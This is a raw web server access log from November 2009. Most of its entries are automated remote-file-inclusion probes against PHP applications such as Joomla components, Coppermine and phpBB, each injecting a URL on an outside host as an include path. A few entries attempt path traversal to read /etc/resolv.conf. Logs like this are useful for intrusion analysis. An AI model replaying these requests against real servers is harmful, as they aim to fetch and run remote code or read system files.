78.110.50.121 - - [01/Nov/2009:02:25:17 -0500] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://bizadmin.hongik.ac.kr/bbs/data/__zbSessionTMP/fx29id1.txt??? HTTP/1.1" 200 24206 "-" "Mozilla/5.0"
61.47.7.71 - - [01/Nov/2009:02:25:19 -0500] "GET /logs/access_log.Q109052400//ashnews.php?pathtoashnews=http://www.newminiclub.nl/logo.gif??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
125.247.60.5 - - [01/Nov/2009:02:26:09 -0500] "GET /logs/access_log.Q109061400/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
125.247.60.5 - - [01/Nov/2009:02:26:35 -0500] "GET /logs/access_log.Q109061400/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
121.136.177.137 - - [01/Nov/2009:02:26:51 -0500] "GET /solpot.html?body=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
125.247.60.5 - - [01/Nov/2009:02:27:08 -0500] "GET /logs/error_log.Q109061400/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
125.247.60.5 - - [01/Nov/2009:02:27:16 -0500] "GET /logs/error_log.Q109061400/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://banner4151.co.kr//cgi/order_image/pdid.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
195.13.191.76 - - [01/Nov/2009:02:27:40 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://0pop.com/id.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
200.91.8.66 - - [01/Nov/2009:02:27:40 -0500] "GET /logs/error_log.Q109092700//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://190.202.108.90/v6id.txt???? HTTP/1.1" 404 263 "-" "libwww-perl/5.803"
195.13.191.76 - - [01/Nov/2009:02:27:41 -0500] "GET /logs/access_log.Q109062400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://0pop.com/id.txt? HTTP/1.1" 404 262 "-" "libwww-perl/5.803"
200.91.8.66 - - [01/Nov/2009:02:28:13 -0500] "GET /logs/access_log.Q109092700//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://190.202.108.90/v6id.txt???? HTTP/1.1" 404 264 "-" "libwww-perl/5.803"
209.59.12.99 - - [01/Nov/2009:02:28:33 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.136.177.137 - - [01/Nov/2009:02:28:34 -0500] "GET /logs/solpot.html?body=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
71.6.151.148 - - [01/Nov/2009:02:28:45 -0500] "GET /logs/access_log.Q109100700/////?_SERVER[DOCUMENT_ROOT]=http://bizadmin.hongik.ac.kr/bbs/data/__zbSessionTMP/fx29id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
195.13.191.76 - - [01/Nov/2009:02:28:46 -0500] "GET /logs/access_log.Q109061200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://0pop.com/id.txt? HTTP/1.1" 404 262 "-" "libwww-perl/5.803"
61.47.7.71 - - [01/Nov/2009:02:29:08 -0500] "GET /logs/access_log.Q109090600%20%20//config/dbutil.bck.php?confdir=http://www.newminiclub.nl/logo.gif??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
125.251.99.2 - - [01/Nov/2009:02:29:43 -0500] "GET //appserv/main.php?appserv_root=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
125.251.99.2 - - [01/Nov/2009:02:29:45 -0500] "GET /logs//appserv/main.php?appserv_root=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
219.127.87.143 - - [01/Nov/2009:02:29:46 -0500] "GET /logs/scrape.php?phpbb_root_path=%20http://dynastyfashionhouse.com/images/as.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
219.127.87.143 - - [01/Nov/2009:02:29:46 -0500] "GET /scrape.php?phpbb_root_path=%20http://dynastyfashionhouse.com/images/as.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
207.14.32.241 - - [01/Nov/2009:02:29:52 -0500] "GET /////?_SERVER[DOCUMENT_ROOT]=http://bizadmin.hongik.ac.kr/bbs/data/__zbSessionTMP/fx29id1.txt??? HTTP/1.1" 200 455 "-" "Mozilla/5.0"
207.14.32.241 - - [01/Nov/2009:02:29:52 -0500] "GET /logs/access_log.Q109100700%20%20/////?_SERVER[DOCUMENT_ROOT]=http://bizadmin.hongik.ac.kr/bbs/data/__zbSessionTMP/fx29id1.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
125.251.99.2 - - [01/Nov/2009:02:29:54 -0500] "GET /logs/access_log.Q109051400//appserv/main.php?appserv_root=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
207.14.32.241 - - [01/Nov/2009:02:29:56 -0500] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://bizadmin.hongik.ac.kr/bbs/data/__zbSessionTMP/fx29id1.txt??? HTTP/1.1" 200 24206 "-" "Mozilla/5.0"
125.251.99.2 - - [01/Nov/2009:02:30:11 -0500] "GET /logs/access_log.Q109092600//appserv/main.php?appserv_root=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
125.251.99.2 - - [01/Nov/2009:02:30:12 -0500] "GET /logs//appserv/main.php?appserv_root=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
125.251.99.2 - - [01/Nov/2009:02:30:13 -0500] "GET //appserv/main.php?appserv_root=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
125.251.99.2 - - [01/Nov/2009:02:30:20 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
125.251.99.2 - - [01/Nov/2009:02:30:20 -0500] "GET /logs/access_log.Q109072900///?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
125.251.99.2 - - [01/Nov/2009:02:30:21 -0500] "GET /logs/access_log.Q109051400%20%20//appserv/main.php?appserv_root=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
125.251.99.2 - - [01/Nov/2009:02:30:20 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 200 24204 "-" "Mozilla/5.0"
125.251.99.2 - - [01/Nov/2009:02:30:24 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
125.251.99.2 - - [01/Nov/2009:02:30:26 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 200 24204 "-" "Mozilla/5.0"
201.136.2.206 - - [01/Nov/2009:02:30:35 -0500] "GET //add.php?Htmls=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 206 "-" "-"
125.251.99.2 - - [01/Nov/2009:02:30:38 -0500] "GET /logs/access_log.Q109090900///?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
201.136.2.206 - - [01/Nov/2009:02:30:39 -0500] "GET //add.php?Htmls=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 206 "-" "-"
201.136.2.206 - - [01/Nov/2009:02:30:40 -0500] "GET //add.php?Htmls=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf%20 HTTP/1.1" 404 206 "-" "-"
125.251.99.2 - - [01/Nov/2009:02:30:44 -0500] "GET /logs/access_log.Q109092600%20%20//appserv/main.php?appserv_root=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
125.251.99.2 - - [01/Nov/2009:02:30:45 -0500] "GET /logs/access_log.Q109072900%20%20///?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
195.13.191.76 - - [01/Nov/2009:02:30:51 -0500] "GET //?path%5Bdocroot%5D=http://0pop.com/id.txt? HTTP/1.1" 200 452 "-" "libwww-perl/5.803"
195.13.191.76 - - [01/Nov/2009:02:31:00 -0500] "GET /logs/error_log.Q109100300//?path%5Bdocroot%5D=http://0pop.com/id.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
125.251.99.2 - - [01/Nov/2009:02:31:02 -0500] "GET /logs/access_log.Q109090900%20%20///?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
195.13.191.76 - - [01/Nov/2009:02:31:04 -0500] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://0pop.com/id.txt? HTTP/1.1" 404 250 "-" "libwww-perl/5.803"
125.251.99.2 - - [01/Nov/2009:02:31:04 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
125.251.99.2 - - [01/Nov/2009:02:31:15 -0500] "GET /logs/access_log.Q109072900///?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
125.251.99.2 - - [01/Nov/2009:02:31:15 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 200 24204 "-" "Mozilla/5.0"
201.130.3.108 - - [01/Nov/2009:02:31:25 -0500] "GET /logs/error_log.Q109092700//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://190.202.108.90/v6id.txt???? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
201.130.3.108 - - [01/Nov/2009:02:31:25 -0500] "GET //components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://190.202.108.90/v6id.txt???? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
201.130.3.108 - - [01/Nov/2009:02:31:26 -0500] "GET /logs//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://190.202.108.90/v6id.txt???? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
125.251.99.2 - - [01/Nov/2009:02:31:26 -0500] "GET /logs/access_log.Q109090900///?_SERVER[DOCUMENT_ROOT]=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
201.130.3.108 - - [01/Nov/2009:02:31:27 -0500] "GET /logs/access_log.Q109092700//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://190.202.108.90/v6id.txt???? HTTP/1.1" 404 264 "-" "libwww-perl/5.805"
85.111.12.199 - - [01/Nov/2009:02:31:35 -0500] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://n34.biz/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
85.111.12.199 - - [01/Nov/2009:02:31:35 -0500] "GET //init_basic.php?GALLERY_BASEDIR=http://n34.biz/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
85.111.12.199 - - [01/Nov/2009:02:31:35 -0500] "GET /logs/access_log.Q109051500//init_basic.php?GALLERY_BASEDIR=http://n34.biz/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
195.13.191.76 - - [01/Nov/2009:02:31:39 -0500] "GET /logs/access_log.Q109091400//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://0pop.com/id.txt? HTTP/1.1" 404 277 "-" "libwww-perl/5.803"
85.111.12.199 - - [01/Nov/2009:02:31:41 -0500] "GET /logs/access_log.Q109051500//init_basic.php?GALLERY_BASEDIR=http://n34.biz/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
85.111.12.199 - - [01/Nov/2009:02:31:41 -0500] "GET //init_basic.php?GALLERY_BASEDIR=http://n34.biz/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
85.111.12.199 - - [01/Nov/2009:02:31:41 -0500] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://n34.biz/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
112.78.14.2 - - [01/Nov/2009:02:31:41 -0500] "GET /logs/access_log.Q109051100%20%20//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
112.78.14.2 - - [01/Nov/2009:02:31:41 -0500] "GET //modules/coppermine/include/init.inc.php?CPG_M_DIR=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
112.78.14.2 - - [01/Nov/2009:02:31:41 -0500] "GET /logs//modules/coppermine/include/init.inc.php?CPG_M_DIR=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
85.111.12.199 - - [01/Nov/2009:02:31:41 -0500] "GET /logs/access_log.Q109081400//init_basic.php?GALLERY_BASEDIR=http://n34.biz/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
85.111.12.199 - - [01/Nov/2009:02:31:44 -0500] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://n34.biz/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
85.111.12.199 - - [01/Nov/2009:02:31:44 -0500] "GET //init_basic.php?GALLERY_BASEDIR=http://n34.biz/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
85.111.12.199 - - [01/Nov/2009:02:31:44 -0500] "GET /logs/access_log.Q109051500%20%20//init_basic.php?GALLERY_BASEDIR=http://n34.biz/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
85.111.12.199 - - [01/Nov/2009:02:31:46 -0500] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://n34.biz/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
85.111.12.199 - - [01/Nov/2009:02:31:46 -0500] "GET /logs/access_log.Q109051500%20%20//init_basic.php?GALLERY_BASEDIR=http://n34.biz/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
85.111.12.199 - - [01/Nov/2009:02:31:46 -0500] "GET //init_basic.php?GALLERY_BASEDIR=http://n34.biz/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
195.13.191.76 - - [01/Nov/2009:02:31:47 -0500] "GET /logs/access_log.Q109080400//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://0pop.com/id.txt? HTTP/1.1" 404 277 "-" "libwww-perl/5.803"
85.111.12.199 - - [01/Nov/2009:02:31:49 -0500] "GET /logs/access_log.Q109081400%20%20//init_basic.php?GALLERY_BASEDIR=http://n34.biz/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
85.111.12.199 - - [01/Nov/2009:02:31:51 -0500] "GET /logs/access_log.Q109081400%20%20//init_basic.php?GALLERY_BASEDIR=http://n34.biz/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
85.111.12.199 - - [01/Nov/2009:02:31:51 -0500] "GET /logs/access_log.Q109081400//init_basic.php?GALLERY_BASEDIR=http://n34.biz/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
61.47.7.71 - - [01/Nov/2009:02:31:57 -0500] "GET //config/dbutil.bck.php?confdir=http://www.newminiclub.nl/logo.gif??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
61.47.7.71 - - [01/Nov/2009:02:31:57 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.newminiclub.nl/logo.gif??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
61.47.7.71 - - [01/Nov/2009:02:31:57 -0500] "GET /logs/access_log.Q109062200//config/dbutil.bck.php?confdir=http://www.newminiclub.nl/logo.gif??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
201.130.3.108 - - [01/Nov/2009:02:32:08 -0500] "GET /logs/access_log.Q109092700%20//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://190.202.108.90/v6id.txt???? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
201.130.3.108 - - [01/Nov/2009:02:32:08 -0500] "GET //components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://190.202.108.90/v6id.txt???? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
201.130.3.108 - - [01/Nov/2009:02:32:08 -0500] "GET /logs//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://190.202.108.90/v6id.txt???? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
201.130.3.108 - - [01/Nov/2009:02:32:16 -0500] "GET /logs/access_log.Q109102200//modules/My_eGallery/index.php?basepath=http://190.202.108.90/v6id.txt???? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
201.130.3.108 - - [01/Nov/2009:02:32:16 -0500] "GET //modules/My_eGallery/index.php?basepath=http://190.202.108.90/v6id.txt???? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
201.130.3.108 - - [01/Nov/2009:02:32:16 -0500] "GET /logs//modules/My_eGallery/index.php?basepath=http://190.202.108.90/v6id.txt???? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
201.130.3.108 - - [01/Nov/2009:02:32:25 -0500] "GET /logs/access_log.Q109051100//modules/My_eGallery/index.php?basepath=http://190.202.108.90/v6id.txt???? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
85.111.12.199 - - [01/Nov/2009:02:33:18 -0500] "GET //init_basic.php?GALLERY_BASEDIR=http://n34.biz/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
85.111.12.199 - - [01/Nov/2009:02:33:18 -0500] "GET /logs/access_log.Q109051500//init_basic.php?GALLERY_BASEDIR=http://n34.biz/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
85.111.12.199 - - [01/Nov/2009:02:33:18 -0500] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://n34.biz/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
85.111.12.199 - - [01/Nov/2009:02:33:18 -0500] "GET //init_basic.php?GALLERY_BASEDIR=http://n34.biz/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
85.111.12.199 - - [01/Nov/2009:02:33:18 -0500] "GET /logs/access_log.Q109051500//init_basic.php?GALLERY_BASEDIR=http://n34.biz/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
85.111.12.199 - - [01/Nov/2009:02:33:18 -0500] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://n34.biz/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
61.47.7.71 - - [01/Nov/2009:02:33:23 -0500] "GET /logs/access_log.Q109102300//config/dbutil.bck.php?confdir=http://www.newminiclub.nl/logo.gif??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
201.130.3.108 - - [01/Nov/2009:02:33:28 -0500] "GET /logs/error_log.Q109090800//components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://190.202.108.90/v6id.txt???? HTTP/1.1" 404 270 "-" "libwww-perl/5.805"
201.130.3.108 - - [01/Nov/2009:02:33:29 -0500] "GET //components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://190.202.108.90/v6id.txt???? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
201.130.3.108 - - [01/Nov/2009:02:33:29 -0500] "GET /logs//components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://190.202.108.90/v6id.txt???? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
201.130.3.108 - - [01/Nov/2009:02:33:29 -0500] "GET /logs/access_log.Q109090800//components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://190.202.108.90/v6id.txt???? HTTP/1.1" 404 271 "-" "libwww-perl/5.805"
209.59.12.99 - - [01/Nov/2009:02:33:33 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
85.111.12.199 - - [01/Nov/2009:02:33:36 -0500] "GET /logs/access_log.Q109081400//init_basic.php?GALLERY_BASEDIR=http://n34.biz/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
85.111.12.199 - - [01/Nov/2009:02:33:36 -0500] "GET /logs/access_log.Q109081400//init_basic.php?GALLERY_BASEDIR=http://n34.biz/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
78.110.50.121 - - [01/Nov/2009:02:33:59 -0500] "GET /logs/access_log.Q109100700/////?_SERVER[DOCUMENT_ROOT]=http://bizadmin.hongik.ac.kr/bbs/data/__zbSessionTMP/fx29id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
222.122.46.179 - - [01/Nov/2009:02:35:48 -0500] "GET /logs/access_log.Q109051400%20%20////index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://hura.fileave.com/NIKOO.txt???? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
121.136.177.137 - - [01/Nov/2009:02:35:58 -0500] "GET /logs/error_log.Q109042900/solpot.html?body=http://klorovers.fileave.com/a.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
201.130.3.108 - - [01/Nov/2009:02:36:17 -0500] "GET /logs/access_log.Q109092700%20//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://190.202.108.90/v6id.txt???? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
122.155.5.84 - - [01/Nov/2009:02:36:22 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.pacificdxpedition.com/images/logs/baner.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
122.155.5.84 - - [01/Nov/2009:02:36:22 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.pacificdxpedition.com/images/logs/baner.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
122.155.5.84 - - [01/Nov/2009:02:36:22 -0500] "GET /logs/access_log.Q109071900%20%20//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.pacificdxpedition.com/images/logs/baner.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
122.155.5.84 - - [01/Nov/2009:02:36:52 -0500] "GET /logs/error_log.Q109072700%20%20//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.pacificdxpedition.com/images/logs/baner.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
222.122.46.179 - - [01/Nov/2009:02:37:15 -0500] "GET /logs/access_log.Q109071200%20%20////index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://hura.fileave.com/NIKOO.txt???? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
61.47.7.71 - - [01/Nov/2009:02:37:56 -0500] "GET /logs/access_log.Q109081800//config/dbutil.bck.php?confdir=http://www.newminiclub.nl/logo.gif??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
209.59.12.99 - - [01/Nov/2009:02:38:33 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
222.73.17.7 - - [01/Nov/2009:02:38:56 -0500] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:02:38:56 -0500] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:02:38:56 -0500] "GET /logs/access_log.Q109081000/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:02:38:56 -0500] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:02:38:56 -0500] "GET /logs/access_log.Q109081000%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:02:38:56 -0500] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:02:39:03 -0500] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:02:39:03 -0500] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:02:39:03 -0500] "GET /logs/access_log.Q109081000/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:02:39:04 -0500] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:02:39:04 -0500] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:02:39:04 -0500] "GET /logs/access_log.Q109081000/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:02:39:04 -0500] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:02:39:04 -0500] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:02:39:04 -0500] "GET /logs/access_log.Q109081000/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.73.17.7 - - [01/Nov/2009:02:39:12 -0500] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
